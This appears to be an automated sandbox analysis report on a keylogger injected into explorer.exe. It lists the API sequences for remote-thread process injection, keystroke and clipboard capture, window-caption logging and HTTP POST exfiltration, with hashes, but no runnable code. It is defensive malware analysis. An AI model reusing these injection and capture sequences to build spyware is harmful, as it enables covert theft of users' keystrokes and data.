                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:9
                                                      Total number of Limit Nodes:2

                                                      Callgraph

                                                      Control-flow Graph
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 000635D8
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_61000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0

                                                      Control-flow Graph
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_61000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
                                                      • String ID:
                                                      • API String ID: 1122579583-0

                                                      Control-flow Graph
                                                      APIs
                                                      • LoadLibraryA.KERNEL32 ref: 0006A147
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0006A1BB
                                                      • VirtualProtect.KERNELBASE ref: 0006A1D9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.628348956.0000000000067000.00000040.80000000.00040000.00000000.sdmp, Offset: 00067000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_67000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0

                                                      Execution Graph

                                                      Execution Coverage:9.5%
                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                      Signature Coverage:17.7%
                                                      Total number of Nodes:322
                                                      Total number of Limit Nodes:4

                                                      Callgraph


                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106C
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081075
                                                      • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107B
                                                      • wsprintfA.USER32 ref: 000810E7
                                                      • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                      • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                      • CharLowerA.USER32(?), ref: 00081199
                                                      • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                      • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                      • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                      • API String ID: 3206029838-2805246637
                                                      • Opcode ID: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                      • Instruction ID: c891c7935db4289d37885e744c3d10944dcfcb3c9ed39a47a4427c91ed757d4e
                                                      • Opcode Fuzzy Hash: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                      • Instruction Fuzzy Hash: 2251C5302047019BD714BF74DC599BA77EDFF84B41F040528F9D6972A2EA389A468F62

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • wsprintfA.USER32 ref: 000810E7
                                                        • Part of subcall function 0008276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                        • Part of subcall function 0008276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                      • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                      • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                      • CharLowerA.USER32(?), ref: 00081199
                                                      • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                      • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                      • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                      • API String ID: 3018447944-2805246637
                                                      • Opcode ID: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                      • Instruction ID: a52374c8d3c32c87d7b7eec75c6ac1f607deb3f7449bc71aaab08c49aa80d9b3
                                                      • Opcode Fuzzy Hash: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                      • Instruction Fuzzy Hash: 6F41A1302047019BD714BF649C959BE77EDFF84B50F000628B9D6972E2EF389E068B62

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_88000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                      • Instruction ID: 0d37eedbe500ee790c8412a6b65a8675b6b3dcc5f5d5e4945e36827d966a7865
                                                      • Opcode Fuzzy Hash: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                      • Instruction Fuzzy Hash: 495124B1A446524AD721BA78DD807B5BBE4FB52334B2C0739C5E6CB3C6E7A45806C7A0

                                                      Control-flow Graph

                                                      control_flow_graph 177 8276d-8277f OpenFileMappingA 178 82781-82791 MapViewOfFile 177->178 179 82794-82798 177->179 178->179
                                                      APIs
                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                      • Instruction ID: b6b55214a3d7b72dd5065cc7f6cf5cc5cfe51089837142714a1d2e3023f5fcf5
                                                      • Opcode Fuzzy Hash: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                      • Instruction Fuzzy Hash: 23D01732715231BBE3745A7B6C0CF83AEDDEFC6AE1B010025B94DD2190D6648810C7F0

                                                      Control-flow Graph

                                                      control_flow_graph 180 8275a-8276c UnmapViewOfFile CloseHandle
                                                      APIs
                                                      • UnmapViewOfFile.KERNEL32(00000000,?,0008129A,00000001), ref: 0008275E
                                                      • CloseHandle.KERNELBASE(?), ref: 00082765
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseFileHandleUnmapView
                                                      • String ID:
                                                      • API String ID: 2381555830-0
                                                      • Opcode ID: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                      • Instruction ID: e78c18ebb3f3fe14dbe1de984ec7bdf689ac5a628f3d417fc22d0e2a98b1dd89
                                                      • Opcode Fuzzy Hash: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                      • Instruction Fuzzy Hash: 7AB0123241503097E32427347C1C9DB3E18FFC96213050144F54D810104B2C0A018FE8

                                                      Control-flow Graph

                                                      control_flow_graph 181 82a09-82a19 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                      • Instruction ID: 854f13ea7621927148a9a8b2bf7c264aaceb780fcb2716b8a169ac4b90289c09
                                                      • Opcode Fuzzy Hash: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                      • Instruction Fuzzy Hash: 0CA002B16501006BFD4457E4DD1DF157658B7C4F01F4045447286C50509D7955449F21

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000818F4
                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0008192F
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000819BF
                                                      • RtlMoveMemory.NTDLL(00000000,00083638,00000016), ref: 000819E6
                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081A0E
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081A1E
                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081A38
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00081A40
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081A4E
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A55
                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00081A6B
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A72
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A88
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AB2
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081AC5
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081ACC
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081AD3
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AE7
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081AFE
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081B0B
                                                      • CloseHandle.KERNEL32(?), ref: 00081B11
                                                      • CloseHandle.KERNEL32(?), ref: 00081B17
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081B1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                      • String ID: atan$ntdll$opera_shared_counter
                                                      • API String ID: 1066286714-2737717697
                                                      • Opcode ID: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                      • Instruction ID: 174d13c8333c33db2c366c6690c673af472261b50b6cc6d7832f0528390f2b82
                                                      • Opcode Fuzzy Hash: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                      • Instruction Fuzzy Hash: D6614B71204205AFE710EF65DC94EABBBECFF88B54F000519F98997291DB74DE058BA2

                                                      Control-flow Graph

                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000827B5
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000827CD
                                                      • lstrlen.KERNEL32(?,00000000), ref: 000827D5
                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000827E0
                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000827FA
                                                      • wsprintfA.USER32 ref: 00082811
                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0008282A
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00082834
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                      • String ID: %02X
                                                      • API String ID: 3341110664-436463671
                                                      • Opcode ID: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                      • Instruction ID: 7af9abcfa44f8fdb20a1014f3b0a0b848b8d4329f526ecb6ba9fbd9c9bd4efaa
                                                      • Opcode Fuzzy Hash: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                      • Instruction Fuzzy Hash: A3112B71900108BFEB119B95EC98EEEBFBCFB88B11F104065FA45E2150DA754F459B60
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00081652
                                                      • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0008167A
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: KeyboardStateUnicode
                                                      • String ID:
                                                      • API String ID: 3453085656-3916222277
                                                      • Opcode ID: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                      • Instruction ID: 29f38b6ab814598dd83ed5aba00077f139db2babf61fac0e1786dbac03cf2fdc
                                                      • Opcode Fuzzy Hash: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                      • Instruction Fuzzy Hash: 1B0184329006299BEB34EB54DD45BFB73FCBF45B10F08441AE9C1E2151E734D9568BA1

                                                      Control-flow Graph

                                                      APIs
                                                      • RtlZeroMemory.NTDLL(00085013,0000001C), ref: 000813C8
                                                      • VirtualQuery.KERNEL32(000813AE,?,0000001C), ref: 000813DA
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0008140B
                                                      • GetCurrentProcessId.KERNEL32(00000004), ref: 0008141C
                                                      • wsprintfA.USER32 ref: 00081433
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081448
                                                      • GetLastError.KERNEL32 ref: 0008144E
                                                      • RtlInitializeCriticalSection.NTDLL(0008582C), ref: 00081465
                                                      • Sleep.KERNEL32(000001F4), ref: 00081489
                                                      • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000814A6
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000814AF
                                                      • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000814D0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000814D3
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000814F1
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0008150D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081514
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0008152A
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                      • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                      • API String ID: 3628807430-1779906909
                                                      • Opcode ID: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                      • Instruction ID: 735b7a70de4e956d7122513613398751e416d658d32f83b3185d311b43a817db
                                                      • Opcode Fuzzy Hash: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                      • Instruction Fuzzy Hash: 7E41B570640B04EBE710BF65EC19E9F3FACFF84B51B004029F6C59A292DB7999018FA1

                                                      Control-flow Graph

                                                      control_flow_graph 255 816b9-816cc RtlEnterCriticalSection 256 817ce-817db RtlLeaveCriticalSection 255->256 257 816d2-816e7 lstrlenW 255->257 258 817cc-817cd 257->258 259 816ed-81700 lstrlenW 257->259 258->256 260 8171e-81721 259->260 261 81702-81719 call 829ce 259->261 263 8174e-81758 GetForegroundWindow 260->263 264 81723-81724 260->264 261->260 263->258 267 8175a-8176f GetWindowTextW 263->267 264->258 266 8172a-8174c call 817dc wsprintfW 264->266 275 817b6-817bd call 829eb 266->275 268 8177a-81789 lstrcmpW 267->268 269 81771-81774 GetClassNameW 267->269 271 8178b-817b3 lstrcpyW call 817dc wsprintfW 268->271 272 817bf-817c6 lstrcatW 268->272 269->268 271->275 272->258 275->258
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(0008582C), ref: 000816C4
                                                      • lstrlenW.KERNEL32 ref: 000816DB
                                                      • lstrlenW.KERNEL32 ref: 000816F3
                                                      • wsprintfW.USER32 ref: 00081743
                                                      • GetForegroundWindow.USER32 ref: 0008174E
                                                      • GetWindowTextW.USER32(00000000,00085850,00000800), ref: 00081767
                                                      • GetClassNameW.USER32(00000000,00085850,00000800), ref: 00081774
                                                      • lstrcmpW.KERNEL32(00085020,00085850), ref: 00081781
                                                      • lstrcpyW.KERNEL32(00085020,00085850), ref: 0008178D
                                                      • wsprintfW.USER32 ref: 000817AD
                                                      • lstrcatW.KERNEL32 ref: 000817C6
                                                      • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000817D3
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                      • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                      • API String ID: 2651329914-3371406555
                                                      • Opcode ID: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                      • Instruction ID: e106a69ff408d8b0d66b3fc31dadf507e352e016c891a9268a5da8e7baf2df89
                                                      • Opcode Fuzzy Hash: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                      • Instruction Fuzzy Hash: CE21B734544A14ABE7217B25FC89EAF3EBCFF81F56B144028F5C196162DE198D028BF5

                                                      Control-flow Graph

                                                      control_flow_graph 284 825f1-8262f GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 285 8267d-8267f 284->285 286 82631-82635 285->286 287 82681-8268e CloseHandle 285->287 288 82671-82677 Thread32Next 286->288 289 82637-8263b 286->289 288->285 289->288 290 8263d-82656 OpenThread 289->290 291 82658-8265e SuspendThread 290->291 292 82660 ResumeThread 290->292 293 82666-8266d CloseHandle 291->293 292->293 293->288
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00082603
                                                      • GetCurrentThreadId.KERNEL32 ref: 0008260B
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0008261B
                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 00082629
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00082648
                                                      • SuspendThread.KERNEL32(00000000), ref: 00082658
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082667
                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 00082677
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082682
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                      • String ID:
                                                      • API String ID: 1467098526-0
                                                      • Opcode ID: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                      • Instruction ID: b03dfa3635f73c53ef02778bef4dd97478a1a04b34a9c8620f52957b2d5eb463
                                                      • Opcode Fuzzy Hash: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                      • Instruction Fuzzy Hash: 5D117C31404200EFE711AF60AC5CB6EBEA4FF84B05F000529FAC692150E7388A199FA3

                                                      Control-flow Graph

                                                      control_flow_graph 294 820a1-820fc call 8240f call 82a09 call 8298a call 824cc 303 820fe-82115 294->303 304 82117-82123 294->304 307 82127-82129 303->307 304->307 308 823fd-8240c call 829eb 307->308 309 8212f-82166 RtlZeroMemory 307->309 313 8216c-82187 309->313 314 823f5-823fc 309->314 315 821b9-821cb 313->315 316 82189-8219a call 8243d 313->316 314->308 321 821cf-821d1 315->321 322 8219c-821ab 316->322 323 821ad 316->323 325 823e2-823e8 321->325 326 821d7-82233 call 8288d 321->326 324 821af-821b7 322->324 323->324 324->321 327 823ea-823ec call 829eb 325->327 328 823f1 325->328 334 82239-8223e 326->334 335 823db 326->335 327->328 328->314 336 82258-82286 call 82a09 wsprintfW 334->336 337 82240-82251 334->337 335->325 340 82288-8228a 336->340 341 8229f-822b6 336->341 337->336 342 8228b-8228e 340->342 347 822b8-822ee call 82a09 wsprintfW 341->347 348 822f5-8230f 341->348 343 82299-8229b 342->343 344 82290-82295 342->344 343->341 344->342 346 82297 344->346 346->341 347->348 352 823b8-823ce call 829eb 348->352 353 82315-82328 348->353 361 823d0-823d2 call 829eb 352->361 362 823d7 352->362 353->352 356 8232e-82344 call 82a09 353->356 363 82346-82351 356->363 361->362 362->335 365 82353-82360 call 829ce 363->365 366 82365-8237c 363->366 365->366 370 8237e 366->370 371 82380-8238d 366->371 370->371 371->363 372 8238f-82393 371->372 373 823ad-823b4 call 829eb 372->373 374 82395 372->374 373->352 375 82395 call 829bd 374->375 377 8239a-823a7 RtlMoveMemory 375->377 377->373
                                                      APIs
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • Part of subcall function 0008298A: lstrlen.KERNEL32(00084FE2,?,00000000,00000000,000820DD,75712B62,00084FE2,00000000), ref: 00082992
                                                        • Part of subcall function 0008298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00084FE2,00000001,00000000,00000000), ref: 000829A4
                                                        • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 00082139
                                                      • wsprintfW.USER32 ref: 00082272
                                                      • wsprintfW.USER32 ref: 000822DD
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823A7
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                      • API String ID: 4204651544-1701262698
                                                      • Opcode ID: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                      • Instruction ID: eb393b0eeacd80a5bfa002af34c47191fe6bec282c1bd132379949c4154c94d3
                                                      • Opcode Fuzzy Hash: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                      • Instruction Fuzzy Hash: A7A13A71608345AFD750AF68D888A6BBBE9FFC8B40F14082DF5C5D7252DA78DA048B52

                                                      Control-flow Graph

                                                      control_flow_graph 379 812ae-812bf 380 812c5-812c7 379->380 381 813a6-813ad 379->381 380->381 382 812cd-812cf 380->382 383 812d4 call 829bd 382->383 384 812d9-812fc lstrlen call 82a09 383->384 387 8136e-81377 call 829eb 384->387 388 812fe-81327 call 82841 RtlZeroMemory 384->388 393 81379-8137d 387->393 394 8139d-813a5 call 829ae 387->394 395 81329-8134f RtlMoveMemory call 82569 388->395 396 81353-81369 RtlMoveMemory call 82569 388->396 397 8137f-81392 call 8255c PathMatchSpecA 393->397 394->381 395->388 405 81351 395->405 396->387 406 8139b 397->406 407 81394-81397 397->407 405->387 406->394 407->397 408 81399 407->408 408->394
                                                      APIs
                                                        • Part of subcall function 000829BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,000812D9,00000000,00000000,?,00000001), ref: 000829C7
                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000812DC
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0008138A
                                                        • Part of subcall function 00082841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00081119,00000001), ref: 00082850
                                                        • Part of subcall function 00082841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00081119,00000001), ref: 00082855
                                                      • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00081316
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081332
                                                        • Part of subcall function 00082569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0008136E), ref: 00082591
                                                        • Part of subcall function 00082569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0008259A
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008135F
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
